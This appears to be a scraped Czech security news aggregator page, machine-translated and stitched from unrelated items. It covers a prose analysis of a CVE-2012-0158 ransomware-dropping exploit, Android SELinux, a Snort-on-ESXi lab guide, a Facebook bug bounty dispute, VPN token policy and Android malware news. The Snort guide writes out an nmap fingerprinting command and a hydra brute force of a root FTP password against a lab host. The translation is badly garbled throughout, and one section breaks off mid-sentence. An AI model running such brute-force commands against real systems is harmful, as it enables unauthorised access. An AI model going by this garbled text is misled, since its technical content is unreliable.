Ale je tu ještě jedna nezodpovězená otázka: Proč byl první decompiler schopen deobfuscate všechny řetězce, a proč jsem musel použít JAD dostat všechno, co?
JD-GUI vrátí bytecode metod, které nelze dekompilovat, ale pro instrukce jako nejméně rozvinuté země (který dává konstantní do zásobníku), nezahrnuje konstanta spolu s instrukcí ve výstupním kódu. To je důvod, proč jsem se nemohl dostat, dokud jsem použil druhý dekompilátor. Například:
V bytecode, šťastně, můžeme najít všechny tyto odkazy a dokončit práci.
Závěrečné myšlenky Když jsem pracoval v tomto binárním Vzpomněl jsem si na prezentaci v BH 2012 o anti-rozklad technik používaných pro Android binárky. To bylo poprvé, co jsem osobně narazil na binární Java provádí něco podobného. Ani oni nejsou tak těžké, aby se zabránilo, analýza je mnohem pomalejší, a to může být opravdu těžké rozluštit velké binární soubory.
Takže tam jsou dvě otevřené otázky: za prvé, co se dá dělat, z dekompilátor pohledu, aby se zabránilo tyto triky? Doufám, že se o tom poradit s autory JD-GUI.
Za druhé, jak můžeme zapsat kód "undecompilable"? Existují automatické nástroje, je to tak? Opět doufám, že se dozvědět více, ale prosím, kontaktujte mě, jestli máte něco užitečného na akcii.
Kuriózní případ CVE-2012-0158 využít
Zranitelnost
CVE-2012-0158 je přetečení vyrovnávací paměti v ListView / TreeView ovládací prvky ActiveX v knihovně MSCOMCTL.OCX. Škodlivý kód, může být vyvolána speciálně vytvořený DOC nebo RTF souboru pro MS Office verze 2003, 2007 a 2010. Ačkoli tato chyba zabezpečení byla oprava společnosti Microsoft více než před rokem, zdá se, že ne každý se staral o instalaci aktualizací. A ti, kteří ne, může být riziko, jak se dostat všechny své dokumenty, obrázky a databáze šifrované pomocí nové verze Gimemo ransomware (detektor našich výrobků Trojan-Ransom.Win32.Gimemo.beic).
Vzhledem k tomu, binární se stále analyzuje, v tomto článku se zaměříme pouze na dodání dílu. I když exploit není zero-day, je to docela zajímavé, protože na složitosti kódu (to se skládá ze 4 fází!) A jednoduchý ale efektivní anti-heuristických technik, které používá.
Ransomware je zrušen a probíhá pomocí škodlivého souboru RTF ("Указ Президента от 12.06.2013.doc", který překládá k "prezidentským dekretem 12.06.2013.doc"), připojené k hromadně posílaných zpráv. Vypuknutí Zdá se, že došlo dne 18. června 2013, kdy Kaspersky Security pro Mail Server Linux zjištěny stovky takových zpráv jako nebezpečný (jejich identifikaci jako Exploit.Generic.Dropper.a). Zatím se zdá, že pouze rusky mluvící uživatelé jsou cílené a většina e-mailů Viděli jsme byli posláni z IP adresy v Německu, s hlavičkou, který je stejný nebo podobný tomuto:
"Přijata: od bersar o 24-host.com s místními (Exim 4.69) (obálky z <admin@24-host.com>) id"
Soubor RTF obsahuje tři vložené objekty. První z nich je balíček se skládá z 12-byte podpisu a škodlivého binární následuje poslední (čtvrtý) stupeň shell kód (oba "zašifrované" s XOR 0x9D).
Tento podpis je používán později jevištní 3 shell kód najít zbytek shell kód a binární v paměti.
Druhý objekt je objekt OLE - který obsahuje chybně DOC soubor, který spouští přetečení vyrovnávací paměti a spustí shell kód. Vložení tohoto dokumentu pomocí propojování a vkládání objektů technologie znamená, že ve zdroji původního souboru RTF uvidíme ASCII reprezentace škodlivého hexadecimálním kódu, spíše než hex kód sám. Jedná se o primitivní technika, která může mít za následek vynechání některé jednoduché heuristické mechanismy. Dále malware spisovatel také postaral poplést všechny konstantních hodnot, které se používají při zpracování ListView ovládací prvek ActiveX. Podstatou bylo vnést držáky a bílých znaků na těchto hodnotách, což je těžší rozpoznat, zatímco oni jsou úplně ignorovány při zpracování OLE složeného dokumentu.
Pokud se otevře nebezpečný RTF soubor v hex editoru, že to není tak snadné rozpoznat kód exploitu na první pohled. Ale jakmile jsme zjistili, umístění ListView CLSID, věci se trochu jednodušší. Ale nemá smysl hledá nejoblíbenější Exploit opcodes, jako 0xEB (JMP instrukce) nebo 0xE8 (instrukce call), tuto chybu má za cíl vyšší. Za prvé se snaží obejít Zabránění spuštění dat pomocí řetězu ROP vycházet z pokynů z zranitelné verze knihovny MSCOMCTL.OCX. Za druhé, používá FLDZ + FSTENV instrukce, jak získat ukazatel instrukcí, který je starý, ale docela neobvyklé techniky a může přehlédnout, zvláště pokud obklopena některé falešné, legitimně vyhlížejících matematických operací.
ROP (Return orientovaného programování) je metoda, kterou vynalezl před pár lety proti Zabránění spuštění dat. Místo toho, aby přímo spustit kód v paměti, které by mohly být označeny jako non-spustitelný, exploit využívá vhodných sekvencí instrukcí, které z jedné sdílené knihovny, za předpokladu, že tato knihovna byla načtena do paměti na adresu předvídatelným. V tomto případě, je navržen tak, aby řetěz ROP přidělit místo na hromadu, zkopírujte druhou etapu shell kód ze zásobníku do tohoto spustitelného paměti a jednoduše říkat.
Druhá část shell kód je popletl se spoustou nevyžádané instrukcí, které nemají významný vliv, ale jsou zde oklamat heuristiky a brání analýzy. Když jsme se vyloučit tyto nesmyslné pokyny (označené "-----", komentář na obrázku níže), můžeme jasně vidět, že tato část je zodpovědná za dekódování třetí fáze shell kódu. Opět platí, že dešifrování rutina je velmi jednoduché - stačí XOR s 0x3D.
Další část kódu implementuje techniku zvanou "vejce lov" najít a spustit finální užitečné zatížení. Co stojí za povšimnutí zde je, že exploit neobsahuje žádné struny, nebo dokonce hash, které by mohly být easlily identifikovány jako podezřelý. Namísto toho používá název délku najít knihovnu kernel32.dll základnu, a rozdíl mezi prvním a druhým DWORD jména najít IsBadReadPtr API.
Jak již víme, jsou ve fázi 4 shell kód a škodlivý binární nachází v první objekt OLE dokumentu ve formátu RTF. Kontrolou následné paměťové bloky s IsBadReadPtr () funkce, exploit identifikuje všechny oblasti paměti, že současný proces je schopen číst. Pak vyhledá prostřednictvím těchto čitelnými bloků pro pořadí bajtů, které se shoduje s podpisem na začátku šifrované škodlivý balíček. Po dešifrování rutina exploit alokuje část paměti na haldě zkopíruje stage 4 shell kód do něj uloží ukazatel na dešifrovaného MZ a skočí na rutinu, která provádí skutečný pokus odstranit a provést binární.
Poslední část shell kódu klesne binární do% TEMP% \ WINWORD.EXE a odstraní klíče registru, které MS Word používá k ukládání informací o souborech, které by mohly potřebovat zotavení. Pak se používá WMI rozhraní WMI (zkratka pro Windows Management Instrumentation) konečně spustit MZ souboru. Proč útočníci používají WMI není zatím jasné. Neviděli jsme tuto techniku v hrdinských činech velmi často.
Přestože shell kód obsahuje dlouhý seznam IIDs a CLSID vztahující se k jiným WMI rozhraní, pouze využívá IWbemLocator rozhraní. Účelem zbytek z nich není znám. Je možné, že malware spisovatel uvedené v tomto seznamu v shell kódu jen poplést, nebo možná, že jsou používány v určitém okamžiku by škodlivý binární.
Shrnutí
Tento konkrétní příklad zneužití není opravdu vymýšlet nic nového a techniky, které používá jsou buď staré nebo velmi jednoduché. Nicméně, toto množství zmatku a anti-heuristických triky je poněkud působivý v jednom souboru:
vícevrstvý objekty OLE držáky + bílých znaků zmatek ROP řetězce obejít DEP FSTENV pokyn, aby se EIP nevyžádané návod XOR zmatek vejce lov technika neobvyklé hash rutina jména API použití WMI spouštět binární Seznam nevyužité WMI UID Malware spisovatelé se hodně úsilí, aby se zabránilo odhalení, ale zdá se zaměřili na systémech s některé konkrétní konfigurace a / nebo běží nějaký zvláštní AV software. Tam byl omezený počet cílů, z nichž většina vychází na Ukrajině. Kaspersky Security pro Mail Server Linux zjištěno několik stovek infikovaných zpráv - všechny byly odeslány během prvního dne ohniska. Na druhou stranu, naše show KSN údaje, které od června 18 a 30 července, byl pouze 55 detekcí Trojan-Ransom.Win32.Gimemo.beic, a to výhradně na Ukrajině. Od 31.července jsme byli svědky stejné (nebo velmi podobné) exploit, pád různé binární (detekován jako Trojan-Spy.Win32.Zbot.nxdk). Budeme se tímto případem zabývali a udržet si aktualizovat. Do té doby, ujistěte se, že jste nainstalovali všechny dostupné bezpečnostní záplaty. I když v tomto případě se jedná o relativně malé cíleného útoku, další CVE-2012-0158 využívá stále velmi rozšířený a používají zločinci k poklesu stovky různých škodlivých souborů.
Android 4.3 a SELinux
Publikováno 20.8.2013 OS
Není mnoho týdny Google vydala nové verze svého vlajkového mobilního operačního systému Android 4.3. I když někteří říkají, že tentokrát Tyto aktualizace byly docela vzácný, z hlediska bezpečnosti tam byly některé nesporné zlepšení (mj. se "MasterKey" zranitelnost nakonec oprava). Jedním z nejvýznamnějších je SELinux. Mnozí jásali událost jako dlouho očekávaný krok, zatímco jiní kritizovali jeho provádění. Osobně si myslím, že dopad není tak jednoduché posoudit, zvláště pokud bychom měli zpochybňovat výhody pro koncové uživatele. Aby se vrhnout nějaké světlo, můžeme si pomoci, ale analyzovat trochu víc, co je SELinux, a jaká je jeho model ohrožení.
Android 4.3 Jellybean logo. Začněme od základů: bezpečnost každé linuxové systém je postaven na konceptu volitelný Access Control (DAC), což znamená, že každý uživatel rozhodne, které z jeho vlastních souborů je přístup (čtení, písemné, nebo popraven), od ostatních uživatelů . Samotný systém je chráněn před zásahy mají všechny systémové soubory vlastněné správního uživatele 'root'. Android je založen na velmi stejné pojmy, ale s malým, ale přesvědčivé navíc: každý app je přiřazen jiný ID uživatele (určité výjimky jsou možné i když), a tím izolovat a chránit aplikačních dat ze všech ostatních aplikací. To je důvod, proč na un-zakořeněné zařízení je poměrně obtížné, ne-li nemožné, legit aplikaci ukrást soukromá data využíván jinou aplikací (pokud, samozřejmě, je to, že datový soubor svět-čitelný).
Gattaca Uživatelé $ ls-las celkem 0 0 drwxr-xr-x 6 kořen admin 204 24 srpna 2012. 0 drwxr-xr-x 31 Kořen kola 16.srpna 1122 12:56 .. 0-rw-r - r -. 1 root kola 0 20 červen 2012 lokalizovány 0 drwxr-xr-x + 11 Hodnocení _guest 374 24.srpna 2012 Host 0 drwxrwxrwt 7 kořen kola 238 9.dubna 15:58 Společná 0 drwxr-xr-x + 87 Stefano personál 11.srpna 2958 10:35 Stefano DAC znamená, že přístup ke spisu a zdroje je definován uživatelem a soubor / adresář režimu. SELinux staví na vrcholu, že (a na 15 let OS NSA výzkumu v oblasti bezpečnosti) a zavádí další bezpečnostní vrstvu, nazývané Povinné Access Control (MAC). Tato vrstva, konfigurovat celý systém politiky, dále upravuje způsob, jakým uživatelé (a tedy aplikace na zařízení se systémem Android) přístup jak jejich a systému poskytovaných údajů, a to vše v transparentním způsobem. Ve více technického hlediska je možno navrhnout takové postupy, které jsou schopny určit typy interakcí proces nakonfigurován tak, aby být součástí kontextu zabezpečení může a nemůže dělat. Jednoduchý, ale přesto účinný příkladem je případ z démona systémového protokolu běží s právy roota (ouch). S SELinux můžeme nastavit celý systém tak, aby tento proces nemůže získat přístup nic jiného než soubor protokolu: budeme prostě muset přiřadit určitý štítek do souboru protokolu, a napsat politiku umožňující log daemon přístup pouze ty soubory, tak označeny (jako vždy, se domnívají, že věci jsou trochu složitější než to :)). Všimněte si dvě výhody plynoucí z tohoto způsobu myšlení: (1) politika je něco, co může být vykonáno celého systému (a dokonce i kořen se jím řídit), (2) jsou oprávnění mnohem více jemnozrnný, než ty, na které prosazována Výborem pro rozvojovou pomoc.
Schopnost omezit to, co super-uživatel může dělat (bez ohledu na jeho výsad) je rozhodující pro ochranu systému před útoky eskalaci práv. To je ve skutečnosti, kde vyniká SELinuxu. Vezměme si případ Gingerbreak, široký-rozšířil využití vykořenit Gingerbread na bázi zařízení. Využít odešle pečlivě budovaný netlink zprávu objemu démona (vold) běží jako root. Vzhledem k některým chybí vázaný kontrolami, zda zpráva může vést k úspěšné vložení kódu a provádění. Vzhledem k tomu, proces běží jako root, ve skutečnosti je triviální, aby se třeli setuid root shell a tam při ovládání přístroje. SELinux by se zastavil, které využívají tím, že popírá ten samý zprávu: výchozí politiky (alespoň v původním patch-set) popírá otevření tohoto typu zásuvky, takže problém je vyřešen. Pokud to nestačí, můžete realizace nesystémové dvojhvězd prostřednictvím tohoto démona procesu dále zakázáno jiným SELinuxu.
shell @ tilapie :/ # ls-Z / system / drwxr-xr-x root root u: object_r: unlabeled: s0 app drwxr-xr-x root shell u: object_r: unlabeled: s0 bin drwxr-xr-x root root u: object_r: unlabeled: s0 atd. ... Nepotištěné FS po OTA aktualizaci. Skvělé, ne? Bohužel, realita je ještě docela daleko od toho. SELinux implementace, která je v současné době nasazen na obrázky Android 4.3 chybí několik důležitých funkcí. Za prvé, je SELinux nakonfigurován v povolujícím režimu pouze, což znamená, že politiky, které nejsou prosazovány, a porušení se právě přihlášen (ne že by užitečné, ale pro testování). Také, jak je uvedeno výše, OTA aktualizace není označit systémový oddíl správně (moje zkušební zařízení opustil mě zmateně na nějakou dobu, až jsem zjistil, že výzkumník Pau Oliva publikoval přesně stejný nález na DEF CON 21 ), což znamená, že populace -obnovení je povinné, pokud developer je vyzkoušet. Konečně, kromě toho, že poskytnuté politika jsou všechno, jen ne omezující, ne MAC je k dispozici pro Android middleware (funkce namísto součástí NSA patch-set ).
Co to znamená pro koncového uživatele, a pak? Bohužel, jak již nyní, nic moc. SELinux jako nasazen na Android 4.3 může být testován a politiky rozvíjet. Tam je také žádný bezpečný způsob, jak vymáhat. Nyní je v čase skutečnosti prodejců OEM. Google intenzivně podporuje vývoj SELinux provedení (BYOD někdo?) Založených na skladě funkcí, spíše než na špatně sestavené doplňky (viz opět mluvenému projevu na DEFCON 21 pro komplexní vysvětlení toho, co "otázky týkající se provádění" může znamenat). Vývojáři, na druhé straně, se důrazně doporučuje, aby si zvykli s výchozím souborem politik a testovat své aplikace pro rozbití. Uvidíme ještě někdy k uvolnění Android se sadou SELinuxu, aby mohly prosadit režim? To, že můžeme jen doufat :)
Běh Snort na ESXi pomocí Distributed Switch
20.8.2013 Zabezpečení
Toto je hostem deník přispěl Basil Alawi V předchozím deníku jsem psal o spuštění odfrkl na VMware ESXi [1] . I když to nastavení by mohlo být vhodné pro malé instalace s jedním zařízením ESXi, může být nevhodný pro větší implementace s více vSphere hostitelů. V tomto deníku se budu zabývat nasazením Snort na větším provedení s SPAN / zrcadlo portů.
SPAN porty vyžadují VMware Distributed Switch (dvSwitch) nebo Cisco Nexus 1000V. VMware dvSwich je k dispozici s VMware vSphere Enterprise Plus, zatímco Cisco Nexus 1000V je třetí strana add-on. Obě řešení vyžaduje vSphere Enterprise Plus a VMware vCenter.
Zkušební laboratoř
Zkušební laboratoř se skládá z VMware ESXi 5.1 jako hostitele VMware vCenter 5.1, Kali Linux, bezpečnostní cibuli a Metaspoitable VM. ESXi 5.1 bude hostitelský systém a Kali VM bude útok serveru, zatímco Metaspoitable bude cíl a bezpečnostní cibule poběží Snort instance. (Obr. 1).
Obrázek 1
Obrázek 1 (Test Lab)
Konfigurace dvSwitch:
VMware VDS rozšiřuje sadu funkcí přepínače VMware normy, a zároveň se zjednoduší zajišťování sítě, sledování a řízení prostřednictvím získávána, jeden Distributed Switch zastoupení více VMware ESX a ESXi serverů v datovém centru VMware [2] .
Chcete-li konfigurovat SPAN portů na VMware dvSwitch:
1.. Přihlaste se do vSphere Client a zvolte sítě zásob názor
2.. Klepněte pravým tlačítkem myši na vSphere Distributed Switch v inventáři panelu a vyberte možnost Upravit nastavení (obr. 2)
Obrázek 2
Obrázek 2
3 - Na kartě Port Mirroring, klepněte na tlačítko Přidat
Obrázek 3
4 Zadejte název a Popis pro relaci zrcadlení portů
Obrázek 4
5 - Ujistěte se, že umožní normální IO na políčko cílový port není vybraná Pokud nevyberete tuto možnost, bude zrcadlit provoz povoleno se na cílové porty, ale žádný provoz bude
Umožněno palců
6 Klepněte na tlačítko Next
7 - Vyberte, zda chcete používat tento zdroj k vniknutí nebo Egress provozu, nebo zvolte vniknutí nástupu / výstupu použít tento zdroj pro oba druhy dopravy .
8-Type zdrojový port ID a klepněte na tlačítko >> přidáte zdroje k relaci zrcadlení portů.
9 - Klepněte na tlačítko Další .
Obrázek 5
10 - Vyberte typ cílového portu ID.
11 - Typ identifikátory cílový port a klepněte na tlačítko >> přidáte cíl do relace zrcadlení portů
12 - Klikněte na Next
13 - Zkontrolujte, zda je uveden název a nastavení nové relace zrcadlení portů jsou správné
14 - Klikněte na tlačítko Povolit tento port zrcadlení relace pro spuštění relace zrcadlení portů okamžitě.
15 - Klikněte na Dokončit .
V tomto cvičení provoz bude metaspoitable VM bude zrcadlo eth1 na serveru Onion bezpečnosti.
Běh cvičenými na eth1 může potvrdit, že zrcadlo konfigurace funguje tak, jak by mělo být:
tcpdump-NNI eth1
Obr. 7
Testování Snort
První test je snímání otisků prstů metaspoitable VM nmap a Snort zachytili úspěšně zkoušen.
nmap-O 192.168.207.20
Obrázek 8
Druhý test se snaží hovado nutit metaspoitable heslo uživatele root pomocí hydra
hydra-l root-P passwords.txt 192.168.207.20 ftp
Obr. 9
Třetí pokus byl pomocí Metasploit využít metaspoitable:
Palestinský hacker objevil v kódu Facebooku závažnou bezpečností díru, díky které umístil příspěvek přímo na zeď Marka Zuckerberga. Nedostane za to však ani dolar.
Hacking | Incidenty
Facebook nabízí velmi atraktivní program, v rámci kterého mohou hackeři a odborníci IT nahlašovat objevené chyby v jeho kódu a inkasovat za to odměnu, která začíná na pěti stech dolarech (10 000 Kč) v závislosti na její závažnosti. A o tuto odměnu měl zájem i Palestinec Khalil Shreateh, který objevil způsob, jak se nabourat do nastavení soukromí Facebooku, díky čemuž může na timeline jakéhokoli uživatele bez jeho souhlasu umisťovat obsah.
Za normálních podmínek by Shreateh za svůj objev inkasoval nemalou odměnu, jeho nahlášení chyby skrze formální kanál Facebooku však bylo ignorováno. Po několika emailech, na něž nikdo nereagoval, se proto tento palestinský hacker rozhodl, že celou věc vezme do svých vlastních rukou a díky chybě umístil zprávu přímo na zeď šéfa Facebooku Marka Zuckerberga. Podle portálu Mashable.com Shreateh původně testoval zneužití na zdi Zuckerbergovy bývalé spolužačky Sarah Goodinové.
Jakmile se mu postup osvědčil, zaslal odkaz zaměstnanci Facebooku starajícímu se o bezpečnost, aby celý problém blíže prověřil. Tento zaměstnanec však neměl Goodinovou v přátelích, takže příspěvek na její zdi neviděl. Po zaslání druhého a třetího emailu, v němž byl expolit popsán zaměstnanec Shreatehovi odepsal: „Je mi líto, ale žádná díra v našem systému není.“ V tento moment Palestinci začala docházet trpělivost, a tak umístil přímo na zeď Zuckerberga zprávu: „Omlouvám se, že narušuji svých příspěvkem vaše soukromí...ale před několika dny jsem našel na Facebooku závažnou bezpečnostní díru.“
Až zde Shreateh konečně upoutal pozornost Facebooku - i když ne tak, jak si představoval. Přestože zaměstnanci společnosti urychleně zakročili a díru opravili, Shreatehův krok se nesetkal s pozitivními reakcemi. Tím, že Palestinec umístil příspěvek na Zuckerbergovu zeď a využil exploit Sheateh porušil politiku Facebooku, která hackerům zakazuje nově objevené chyby bez dovolení používat na účtech jiných uživatelů. V důsledku toho byl jeho účet dočasně suspendován a není třeba dodávat, že neobdrží za svůj objev žádnou finanční kompenzaci.
„Využití bezpečnostní díry tak, že to má dopad na reálné uživatele, není akceptovatelné. V tomto případě byla díra zneužita k umístění příspěvků na timeline několika uživatelů bez jejich svolení a byla tak porušena na Responsible Disclosure Policy. Žádná odměna proto nemůže být vyplacena,“ uvedl pro server Hacker News Matt Jones z Facebooku.
Rozmohl se u nás neoprávněný přístup k firemní síti z domácích počítačů – a zjistili jsme to jen náhodou.
Bezpečnost
Co řešit: Když byly hardwarové tokeny při dvoufaktorové autentizaci nahrazeny softwarovými, má do korporátní sítě přístup mnoho počítačů, které nejsou součástí firemní sítě. Akční plán: Ustanovit pravidla pro vzdálený přístup bez jakýchkoliv výjimek.
Nedávno jsme nasadili softwarové autentizační tokeny RSA SecurID, které jsou náhradou za hardwarové tokeny využívané pro zajištění silné autentizace vzdáleného přístupu přes klienta VPN.
Hardwarové zařízení jsou pro dvoufaktorovou autentizaci v mnoha ohledech bezpečnější (ale ne ve všech směrech, jak uvidíte), ale ty na softwarové bázi mohou být použity i v přenosných zařízeních, jako jsou mobilní telefony, jsou také mnohem levnější a lze je rychleji a snáze nasadit.
A co víc, když už uživatel nepotřebuje přístup, je mnohem jednodušší zakázat softwarový token, který dosud používal, než od něj zpětně vyžadovat hardwarový token, zvláště pokud je odněkud z Číny, Ruska nebo Indie.
Samozřejmě RSA v minulém roce utrpěla notoricky známé narušení bezpečnosti, ale poté, co jsem se seznámil s podrobnostmi, považuji jejich technologie i nadále za bezpečné.
Výhody softwarových tokenů? Implementace softwarového tokenu může být zajímavá, protože máte šanci dozvědět se některé děsivé praktiky, které se děly bez vašeho vědomí.
Jakmile například zaměstnanci dostali zprávu, že jejich hardwarové tokeny již nebudou funkční, někteří z nich začali požadovat instalaci softwarových tokenů do svých domácích počítačů PC a Mac.
Z toho je zřejmé, že výhodu přenositelnosti hardwarových tokenů využívali pro libovolný počítač. Náš VPN klient umožňuje plný přístup k síti, což v kombinaci s chybějícími komponentami NAC (Network Admissions Control) znamenalo, že máme v naší síti neznámý počet nefiremních počítačů.
Samozřejmě že nemohu ručit za integritu kteréhokoli z těchto cizích strojů. Domácí počítače jsou často používány i rodinnými příslušníky či dalšími osobami a kdokoli z nich na ně mohl nainstalovat nedůvěryhodné aplikace, kliknout na věci, na které by neměl, a tím nakonec naši interní produkční síť nakazit.
Také se obávám o ochranu duševního vlastnictví, což je moje hlavní zodpovědnost. Můžeme bez problému kontrolovat obsah libovolného zařízení, které jsme našim zaměstnancům vydali, ale nemáme žádné právo pro revizi osobních zařízení, a to i v případě, že jsou do naší sítě připojena.
Kromě toho jsou v některých státech a zemích velmi neurčité zákony ohledně možnosti monitorovat aktivity, když zaměstnanec využívá osobní zařízení. Pokud by takový pracovník opustil společnost, mohlo by naše duševní vlastnictví snadno zmizet i s ním.
Jako dobrý příklad také může posloužit riziko problémů spojené s dodržováním licenčních podmínek.
Aktivní linka technické podpory Zatímco naši zaměstnanci si nemusí být úplně vědomi toho, že by se neměli připojovat do sítě ze svých vlastních počítačů, personál naší linky technické podpory by to vědět měl, že?
Pravdou ale je, že dokonce pomáhalifiremním zaměstnancům nainstalovat klienta VPN do jejich domácích počítačů.
Abych si tuto skutečnost ověřil, zavolal jsem na linku technické podpory s urgentním požadavkem pro přístup ze svého domácího počítače. Poslali mi plného VPN klienta a podrobně mi poradili s instalací na mém přístroji.
Po této zkušenosti jsem zkontroloval, co v posledních týdnech tato linka podpory dělala, a zjistil jsem, že technici také pomohli s instalací VPN klientů do počítačů v kioscích veřejného internetu či v hotelových lobby.
To už nesmělo pokračovat. Pokud zaměstnanec potřebuje přístup do naší sítě z domova nebo jiného vzdáleného místa, musí naše společnost takovému pracovníkovi vydat notebook.
V mnoha případech již takové zařízení má a je jen příliš líný nosit si ho domů nebo upřednostňuje používání počítačů Mac.
Dokud však nenasadíme bezpečnější metodu vzdáleného přístupu, jako je prostředí virtuálního desktopu nebo izolovaného prostoru VPN, budu takové druhy výjimek zakazovat.
Kyberzločin: Android je jako mobilní Windows
Podle nového výzkumu se nejrozšířenější mobilní operační systém Android stal pro kyberzločince stejně populárním cílem útoků jako systém Windows v počítačích.
Mobil | Viry | Kriminalita
Bezpečnostní společnost Kaspersky Lab ve své poslední zprávě o vývoji malwaru mimo jiné uvedla, že Android, který používá téměř 80 % smartphonů, se pomalu vyrovnává nadvládě Windows v počítačích. Android se tak podle společnosti stává nejzajímavějším mobilním cílem útoků.
Rozdíl mezi malwarem pro Windows a Android je v tom, že druhý jmenovaný se rozvíjí mnohem rychleji, protože zločinci využívají svých zkušeností získaných za posledních 20 let ve světě osobních počítačů. „Vývoj malwaru pro Android probíhá mnohem rychleji, než tomu bylo v případě Windows,“ informoval Roel Schouwenberg, vrchní výzkumník Kaspersky Lab.
„Nejpovedenějším“ malwarem je prozatím Backdoor.AndroidOS.Obad.a, který společnost označila v červnu tohoto roku za prozatím nejdůmyslnějšího mobilního trojského koně. Dokáže například otevřít zadní vrátka pro stahování souborů, krást informace o telefonu a instalovaných aplikacích, odesílat SMS na prémiová čísla a šířit malware pomocí připojení Bluettoth.
Obad také využívá šifrování a zakrývání kódu, aby mátl antivirové analýzy. Navíc zneužívá tři nové slabiny Androidu. Kaspersky Lab po analýze kódu tohoto trojského koně dospěla k závěru, že se svou stavbou podobá malwaru pro Windows.
Naprostá většina nově vznikajícího malwaru stále míří na nejvýnosnější Windows. Rostoucí počet vzorků škodlivých programů v Androidu nicméně dává tušit, že nastupující generace kyberzločinců se nyní začíná zaměřovat na smartphony, jejichž prodeje začaly převyšovat prodeje nových počítačů.
V první polovině tohoto roku počet shromážděných vzorků škodlivého kódu poprvé pokořil hranici 100 000. Což je více než za celý loňský rok, kdy Kaspersky Lab nasbírala 76 000 vzorků. Přesto však míra nakažení smartphonu zůstává poměrně nízká. Například při červnovém třídenním pátrání po Obadu zaznamenal Kaspersky 0,015 % pokusů o instalaci ze všech zaznamenaných malwarů.
Míra nakažení bude pravděpodobně stoupat s tím, jak se vyvinou další distribuční kanály kromě primárního Google Play a několika dalších, které jsou v provozu v současnosti.
Google přináší patch pro Android SecureRandom provedení
Publikováno dne 16. srpna 2013. Mobil | Zranitelnosti
Bezpečnost Android inženýr opět potvrdil existenci zranitelnosti, která dělala nejpopulárnější Bitcoin aplikace peněženka pro platformu otevřenou k útoku, a nabídl pomoc pro vývojáře. Jako připomínka: chudí Android implementace Java SecureRandom třídy vynaložila veškeré soukromé klíče generován na zařízení se systémem Android slabé a snadno rozluštit útočníky. Jako každá transakce Bitcoin musí být podepsána soukromým klíčem spojené s Bitcoin adresu osoby, která hodlá převést peníze, je snadné vidět, jak věděl něčí kryptografický soukromý klíč může dovolit škodlivé jednotlivci Vyprázdnění osoby peněženku. "Nyní jsme zjistili, že aplikace, které používají Java Cryptography Architecture (JCA) pro generování klíčů, podepsání nebo generování náhodných čísel nemusí obdržet kryptograficky silné hodnoty na zařízeních se systémem Android v důsledku nesprávné inicializaci základní PRNG, "vysvětlil v blogu. "Aplikace, které se přímo odvolávat na systému OpenSSL PRNG pokud bez výslovného inicializace systému Android jsou také ovlivněny. Žádosti, které stanovují TLS / SSL spojení pomocí HttpClient a java.net třídy nejsou ovlivněny jako ty třídy se semene na PRNG OpenSSL s hodnotami z / dev / urandom . Vývojáři, kteří používají JCA pro generování klíčů, měl by podpis nebo generování náhodných čísel aktualizovat své aplikace explicitně inicializovat PRNG s entropií z / dev / urandom nebo / dev / random . " On také zahrnovala navrhované provádění v blogu, a potvrdil, že Google vyvinula opravy, které zajistí, že Android je OpenSSL PRNG je správně inicializován a zaujal ty patche otevřít partnery Handset Alliance. Bitcoin Nadace rovněž aktualizován svůj původní příspěvek upozorňující uživatele Problém by potvrdil, že Bitcoin Wallet, BitcoinSpinner, Mycelium Bitcoin Wallet a blockchain.info aplikace byly aktualizovány tak, aby tento problém vyřešit. Mají také instrukce pro uživatele, co dělat poté, co stáhnout a nainstalovat tyto nejnovější verze, nebo v případě, že nemohou aktualizovat své aplikace pro Android.
Je hybridní cloud budoucnost pro podniky?
Publikováno dne 16. srpna 2013. IT
Zatímco veřejný cloud zůstává důležité pro IT s rozhodovací pravomocí na Velké Británii a USA podniky, omezení využití tohoto typu platformy jako one-size-fits-all řešení jsou stále více zřejmé.
Podle průzkumu Rackspace, tato omezení vedou mnoho respondentů se obrátit na hybridní cloud infrastruktury (např. veřejná oblačnosti, privátní cloud a dedikované servery pracují společně v libovolné kombinaci), u některých aplikací nebo pracovní zátěže. studie zkoumala použití různých typů mraky - veřejné, soukromé a hybridní - spolu s dedikovaných serverů od Velké Británie a amerických podniků. Studie zjistila, že 60 procent respondentů se přestěhovali, nebo uvažujete o stěhování některých aplikací nebo pracovní zátěže buď částečně (41 procent) nebo úplně (19 procent) z veřejného cloudu, protože jeho omezení nebo potenciální výhody z jiných platforem, jako je hybridní mrak. Výzkum také ukazuje, že většina (60 procent), IT s rozhodovacími pravomocemi viz hybridní cloud jako vyvrcholení svého cloud cesty, spíše než odrazovým můstkem k používání veřejné mrak sám pro všechny jejich potřeby cloud. John Engates, technický ředitel z Rackspace, říká: "Výsledky naší studie ukazují, že hybridní cloud je další cloud pro mnoho organizací. Mohou začali s veřejným cloud pouze pro architekturu, ale došli k omezení tohoto přístupu, protože jsem pokračovala na své cestě cloud. Obracejí se na hybridní cloud, protože to může spojit to nejlepší z veřejného cloudu, privátní cloud a dedikované servery, poskytuje společnou architekturu, které mohou být přizpůsobeny pro vytvoření nejvhodnější pro jejich specifické potřeby. Například, místo toho se snaží spustit velkou databázi ve veřejném cloudu na jeho vlastní, což může být velmi problematické, podniky mohou využívat hybridní cloud spustit tuto databázi mnohem efektivněji na vyhrazený server, který vtrhl do veřejného cloudu při potřeba. " Rackspace Studie také zjistila, že hybridní cloud je nyní používán téměř tři čtvrtiny (72 procent) respondentů pro alespoň část svého aplikačního portfolia, s organizací ve Spojených státech (80 procent), budou pravděpodobně používat než UK organizací (64 procent). Z hlavních důvodů, proč respondenti dali jejich organizace používá hybridní cloud místo veřejný cloud pouze přístup pro určité aplikace nebo pracovní zátěže jsou lepší zabezpečení (52 procent), více kontroly (42 procent), a lepší výkon nebo spolehlivost (37 procent). Posílení těchto zjištění, hybridní cloud uživatelé hlásí nejvyšší výhody, které jsme zažili od toho jsou kontroly (59 procent), vyšší bezpečnost (54 procent), vyšší spolehlivost (48 procent), nižší náklady (46 procent) a vyšší výkon (44 procent). Konkrétně se jedná o průměrné snížení celkových nákladů z cloudu pomocí hybridní cloud - pro ty, kteří viděli snížení - je podstatné, na 17 procent.
Panda Security uvádí na trh 2014 maloobchodní linku
Publikováno dne 16. srpna 2013 Zabezpečení
Panda Security zahájila Panda Global Protection 2014, Panda Internet Security 2014 a Panda Antivirus Pro 2014.
